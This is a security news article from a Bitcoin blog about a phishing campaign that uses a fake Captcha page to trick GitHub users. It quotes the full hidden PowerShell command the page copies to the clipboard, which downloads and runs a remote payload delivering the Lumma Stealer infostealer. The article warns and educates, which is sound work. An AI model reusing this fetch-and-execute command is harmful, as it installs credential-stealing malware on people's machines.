Clever Social Engineering Attack Exploits Captchas to Target GitHub Users

Written By Bitesize Bitcoin

A recent phishing attack is leveraging a unique twist to target GitHub users through a cleverly disguised Captcha page. This attack tricks developers into executing malicious scripts on their machines by masking it behind a seemingly harmless Captcha challenge.

The attack begins with an email that mimics GitHub's security team, claiming to have detected a vulnerability in the recipient’s repository. It instructs users to visit a fake website, "github-scanner[.]com", to resolve the issue. While GitHub does offer free security scans, users are typically directed to review results directly on GitHub’s platform, making the request to visit a third-party site suspicious.

The Fake Captcha

Upon visiting the malicious site, users are presented with what appears to be a standard "I'm not a robot" Captcha, a familiar interaction for most internet users. However, instead of solving a typical Captcha, users are presented with a more complex screen designed to trick them into running malicious code on their systems.

Hidden Payload in the Captcha Challenge

The website executes a JavaScript function that copies an exploit string to the user’s clipboard. The exploit is executed through a simple sequence: pressing "Windows+R" opens the Windows run dialog, prompting the victim to paste and run the malicious code without realizing its true intent.

The copied script appears harmless but actually runs a hidden PowerShell command:

scss

powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner[.]com/download.txt').Content"

This command silently downloads and executes a secondary malicious file, "l6E.exe", a known information stealer identified as "Lumma Stealer."

Immediate Detection but Growing Risks

Though Microsoft Defender successfully identified and blocked the malicious "l6E.exe" file, this attack highlights a growing trend where infostealers increasingly target developers. The rapid rise of these social engineering tactics is a reminder of the importance of vigilance, particularly as these phishing schemes continue to evolve.

For now, the "github-scanner" domain is flagged by some anti-malware tools, but it hasn't yet been added to Google's Safe Browsing blocklist, increasing the risk for unprotected users.

As a reminder, always be cautious when receiving unsolicited emails, particularly those urging you to visit third-party websites. Verify all communications through official channels, and avoid executing any commands from untrusted sources.

Stay safe, and always be alert for phishing attempts that attempt to exploit even the smallest of details.

Read More

Articles
The IMF’s $1.4 Billion Shackle
The IMF’s $1.4 Billion Shackle
The Fine Line: Bitcoin Companies Navigating Regulation and Freedom
The Fine Line: Bitcoin Companies Navigating Regulation and Freedom
The Rapid Rise of Bitcoin Fiction
The Rapid Rise of Bitcoin Fiction
The Flaws of the Lummis Bitcoin Act.
The Flaws of the Lummis Bitcoin Act.
Uncensoring Art
Uncensoring Art
100k and Counting: The Revolution Beyond The Price
100k and Counting: The Revolution Beyond The Price
Why Fix Something That Isn't Broken?
Why Fix Something That Isn't Broken?
Inspiring Bitcoin Education With AmityAge
Inspiring Bitcoin Education With AmityAge
Bitcoin and Fixed Income
Bitcoin and Fixed Income
Think You Know Bitcoin Security?
Think You Know Bitcoin Security?
The "Fools" Golden Generation
The "Fools" Golden Generation
The Educational Mind Virus
The Educational Mind Virus
What Do People Mean When They Say “Fix the Money Fix the World”
What Do People Mean When They Say “Fix the Money Fix the World”
Bitcoin Mining Analysis: Brought to you by Pantheon Mining
Bitcoin Mining Analysis: Brought to you by Pantheon Mining
BTCPay Day 2024: Riga, Latvia
BTCPay Day 2024: Riga, Latvia
River's Report Highlights 30% Growth in Business Bitcoin Adoption in 2023
River's Report Highlights 30% Growth in Business Bitcoin Adoption in 2023
Key Hiring Trends and Top Roles August 2024
Key Hiring Trends and Top Roles August 2024
The fight for freedom: A conversation with Tony from The Bitcoin Way on resistance and sovereignty
The fight for freedom: A conversation with Tony from The Bitcoin Way on resistance and sovereignty
The Inflation Age
The Inflation Age
Bitcoin Mining Analysis: Brought to you by Pantheon Mining
Bitcoin Mining Analysis: Brought to you by Pantheon Mining
The Infiltration of Chinese Carmaker Chery into the UK Market
The Infiltration of Chinese Carmaker Chery into the UK Market
Learning Bitcoin One Step at the Time
Learning Bitcoin One Step at the Time
“I want to work in Bitcoin, but I’m not a developer!”
“I want to work in Bitcoin, but I’m not a developer!”

Latest

Bitesize Bitcoin

Previous

LNDg v1.9.0 Released: New Features and Improvements for Efficient LND Management
Next

Riot and Bitfarms Reach Settlement in Hostile Bitcoin Mining Takeover Bid